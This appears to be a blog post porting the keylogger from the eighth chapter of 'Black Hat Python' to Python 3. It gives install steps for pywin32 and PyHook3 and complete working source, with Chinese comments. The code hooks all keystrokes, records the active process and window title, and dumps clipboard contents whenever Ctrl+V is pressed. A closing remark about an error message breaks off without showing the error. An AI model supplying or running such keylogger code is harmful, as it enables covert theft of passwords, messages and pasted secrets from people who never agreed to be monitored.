Python black hat: hackers and penetration testing programming. There is a keylogger in the eighth chapter of this book, but because the book is implemented in python2, it cannot run now, and there is almost no implementation in python3 on the Internet, so I tried to implement it myself, but there are still some problem.
The first is the download of pythoncom and pyhook package
pythoncom:
pip install pywin32
pyhook download:
download link: https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook After
downloading and saving in a directory, directly pip install xx , (Xx is the location where you installed the package).
But the following error will appear when running: TypeError: KeyboardSwitch() missing 8 required positional arguments:'msg','vk_code','scan_code','ascii','flags','time','hwnd', and'win_name'
At this time you need to install pyhook3
pip install PyHook3
specific installation: https://www.cnblogs.com/pmh905001/p/12194504.html
Below is the code
from ctypes import *
import pythoncom
import PyHook3 as pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
# 获取最上层的窗口句柄
hwnd = user32.GetForegroundWindow() # 获得前台窗口句柄
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
process_id = "%d" % pid.value # 将进程ID存入变量中
# 申请内存
executable = create_string_buffer(1024)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512) # 获得进程名
# 读取窗口标题
window_title = create_string_buffer(512)
length = user32.GetWindowTextA(hwnd, byref(window_title), 512) # 获得窗口名
# 打印
print()
print("[PID: %s-%s-%s]" % (process_id, executable.value, window_title.value))
# 关闭handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
# 定义击键监听事件函数
def key_event(event):
global current_window
if event.WindowName != current_window: # 检查目标是否切换了窗口
current_window = event.WindowName
get_current_process()
print(" ")
if event.Ascii > 32 and event.Ascii < 127: # 检查是否为常规按键
print(chr(event.Ascii), end=" ")
else:
if event.Key == "V": # 如果是CTRL+V,则获取剪贴板内容
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print("[PASTE] - %s" % (pasted_value), end=' ')
else:
print("[%s]" % event.Key, end=' ')
# 循环监听下一个敲键事件
return True # 返回到下一个钩子事件
def key_logger():
hooker = pyHook.HookManager() # 创建构造函数管理器
hooker.KeyDown = key_event # 注册钩子按键事件的处理函数
hooker.HookKeyboard() # 创建键盘钩子
pythoncom.PumpMessages() # 执行
if __name__ == "__main__":
key_logger()
However, the code defect is that it cannot record Chinese characters. The code originally applied for memory is
#申请内存
executable = create_string_buffer("\x00"*1024)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512) #获得进程名
But when I run it like this, the following error will be reported: 
But after the modification, Chinese characters cannot be recorded, so the current code can only record characters.